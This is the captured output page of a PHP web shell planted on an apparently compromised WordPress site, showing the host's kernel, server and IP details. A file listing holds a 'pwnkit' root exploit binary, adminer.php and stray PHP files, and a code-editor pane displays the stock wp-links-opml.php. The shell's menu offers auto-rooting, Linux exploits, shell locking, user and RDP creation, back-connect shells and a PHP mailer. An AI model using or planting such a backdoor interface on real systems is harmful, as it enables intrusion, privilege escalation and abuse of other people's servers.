Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.128
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
ZOUERATE.COM /
leranch /
[ HOME SHELL ]
Name
Size
Permission
Action
_vti_cnf
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwx---r-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
0
B
-rwxr--r--
.mad-root
0
B
-rw-r--r--
2index.php
3.78
KB
-rw----r--
AAA-zouerate_com_9
0
B
-rw-r--r--
_index.php
397
B
-rwxr--r--
adminer.php
465.43
KB
-rw-r--r--
favicon.ico
533
B
-rwxr--r--
index.php
60
B
-rwxr--r--
license.txt
15.05
KB
-rwxr--r--
pwnkit
10.99
KB
-rwxr-xr-x
radio.php
3.78
KB
-rw----r--
radio.txt
40
B
-rw----r--
readme.html
389
B
-r--r--r--
wp-app.php
33.27
KB
-rwxr--r--
wp-atom.php
555
B
-rwxr--r--
wp-blog-header.php
13.56
KB
-rwxr--r--
wp-comments-post.php
3.02
KB
-rwxr--r--
wp-commentsrss2.php
625
B
-rwxr--r--
wp-config-sample.php
1.53
KB
-rwxr--r--
wp-config.php
1.52
KB
-rw-------
wp-cron.php
1.23
KB
-rwxr--r--
wp-feed.php
661
B
-rwxr--r--
wp-links-opml.php
1.94
KB
-rwxr--r--
wp-load.php
1.9
KB
-rwxr--r--
wp-login.php
18.9
KB
-rwxr--r--
wp-mail.php
6.25
KB
-rwxr--r--
wp-pass.php
487
B
-rwxr--r--
wp-rdf.php
473
B
-rwxr--r--
wp-register.php
316
B
-rwxr--r--
wp-rss.php
484
B
-rwxr--r--
wp-rss2.php
555
B
-rwxr--r--
wp-settings.php
16.77
KB
-rwxr--r--
wp-trackback.php
3.35
KB
-rwxr--r--
xmlrpc.php
73.64
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-links-opml.php
<?php /** * Outputs the OPML XML format for getting the links defined in the link * administration. This can be used to export links from one blog over to * another. Links aren't exported by the WordPress export, so this file handles * that. * * This file is not added by default to WordPress theme pages when outputting * feed links. It will have to be added manually for browsers and users to pick * up that this file exists. * * @package WordPress */ if (empty($wp)) { require_once('./wp-load.php'); wp(); } header('Content-Type: text/xml; charset=' . get_option('blog_charset'), true); $link_cat = $_GET['link_cat']; if ((empty ($link_cat)) || ($link_cat == 'all') || ($link_cat == '0')) { $link_cat = ''; } else { // be safe $link_cat = '' . urldecode($link_cat) . ''; $link_cat = intval($link_cat); } ?><?php echo '<?xml version="1.0"?'.">\n"; ?> <?php the_generator( 'comment' ); ?> <opml version="1.0"> <head> <title>Links for <?php echo attribute_escape(get_bloginfo('name', 'display').$cat_name); ?></title> <dateCreated><?php echo gmdate("D, d M Y H:i:s"); ?> GMT</dateCreated> </head> <body> <?php if (empty ($link_cat)) $cats = get_categories("type=link&hierarchical=0"); else $cats = get_categories('type=link&hierarchical=0&include='.$link_cat); foreach ((array) $cats as $cat) { $catname = apply_filters('link_category', $cat->name); ?> <outline type="category" title="<?php echo attribute_escape($catname); ?>"> <?php $bookmarks = get_bookmarks("category={$cat->term_id}"); foreach ((array) $bookmarks as $bookmark) { $title = attribute_escape(apply_filters('link_title', $bookmark->link_name)); ?> <outline text="<?php echo $title; ?>" type="link" xmlUrl="<?php echo attribute_escape($bookmark->link_rss); ?>" htmlUrl="<?php echo attribute_escape($bookmark->link_url); ?>" updated="<?php if ('0000-00-00 00:00:00' != $bookmark->link_updated) echo $bookmark->link_updated; ?>" /> <?php } ?> </outline> <?php } ?> </body> </opml>
Close